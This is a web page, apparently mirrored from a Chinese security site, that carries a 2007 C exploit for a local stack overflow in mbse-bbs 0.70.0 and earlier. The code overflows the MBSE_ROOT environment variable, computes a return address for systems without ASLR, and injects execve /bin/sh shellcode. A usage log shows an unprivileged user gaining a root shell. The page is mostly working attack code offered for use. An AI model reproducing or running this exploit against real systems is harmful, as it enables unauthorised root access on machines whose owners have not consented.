首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
GNU/Linux mbse-bbs <= 0.70.0 Local Buffer Overflow Exploit
来源:vfocus.net 作者:prdelka 发布时间:2007-01-19  

/* GNU/Linux mbse-bbs 0.70.0 & below stack overflow exploit
* ========================================================
* Multiple overflow conditions occur within mbse-bbs versions 0.70.0 & below.
* The current version of mbse-bbs does not contain these weaknesses.
* Exploitation of these vulnerabilities can facilitate a privilege escalation
* attack in which an unprivileged user becomes root. Exploit calculates
* return address where ASLR is not in use. Vulnerable code is shown below;
*
* matthew@localhost ~/foo/mbsebbs-0.70.0/unix $ cat -n mbuseradd.c
* ...
* 177 shell = calloc(PATH_MAX, sizeof(char));
* ...
* 228 sprintf(shell, "%s/bin/mbsebbs", getenv("MBSE_ROOT"));
*
* (heap corruption in 0.33.17/stack overflow in others).
* *** glibc detected *** free(): invalid next size (normal): 0x0804e068 ***
*
* Example Usage.
* matthew@localhost ~ $ id
* uid=1000(matthew) gid=100(users) groups=10(wheel),100(users)
* matthew@localhost ~ $ ./prdelka-vs-GNU-mbsebbs /opt/mbse/bin/mbuseradd
* [ GNU/Linux mbse-bbs 0.70.0 & below stack overflow exploit
* [ Using return address 0xbfffefd8
* sh-3.1# id
* uid=0(root) gid=1(bin) groups=10(wheel),100(users)
*
* - prdelka
*/
#include <stdio.h>
#include <stdlib.h>

char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x31\xc0\x50\x68""//sh""\x68""/bin""\x89\xe3"
"\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

int main(int argc,char* argv[]) {
int i;
long eip = 0x41414141;
char envh[]="MBSE_ROOT=";
printf("[ GNU/Linux mbse-bbs 0.70.0 & below stack overflow exploit\n");
if(argc < 2) {
printf("Error: [path]\n");
exit(0);
}
char* buffer = malloc(strlen(envh) + 4085 + sizeof(eip));
strcpy(buffer,envh);
long ptr = (long)buffer;
for(i = 1;i <= 4061;i++){
strncat(buffer,"A",1);
}
ptr = ptr + 4061;
memcpy((char*)ptr,(char*)&eip,4);
eip = 0xc0000000 -4 -strlen(argv[1]) -1 -strlen(buffer) -1 -strlen(shellcode) -1;
memcpy((char*)ptr,(char*)&eip,4);
char *env[] = {buffer,NULL};
printf("[ Using return address 0x%x\n",eip);
execle(argv[1],argv[1],"x","x","x",shellcode,NULL,env);
exit(0);
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·phpBP <= RC3 (2.204) (sql/c
·phpIndexPage <= 1.0.1 (conf
·Mac OS X 10.4.8 SLP Daemon Ser
·Apple iChat 3.1.6 v441 aim://
·BrowseDialog Class (ccrpbds6.d
·Mac OS X 10.4.x Kernel shared_
·迅雷5 ThunderAgent Module 远程
·Sun Microsystems Java GIF File
·Microsoft Help Workshop 4.03.0
·3Com TFTP Service <= 2.0.1
·MS Internet Explorer VML Downl
·Mafia Scum Tools 2.0.0 (index.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved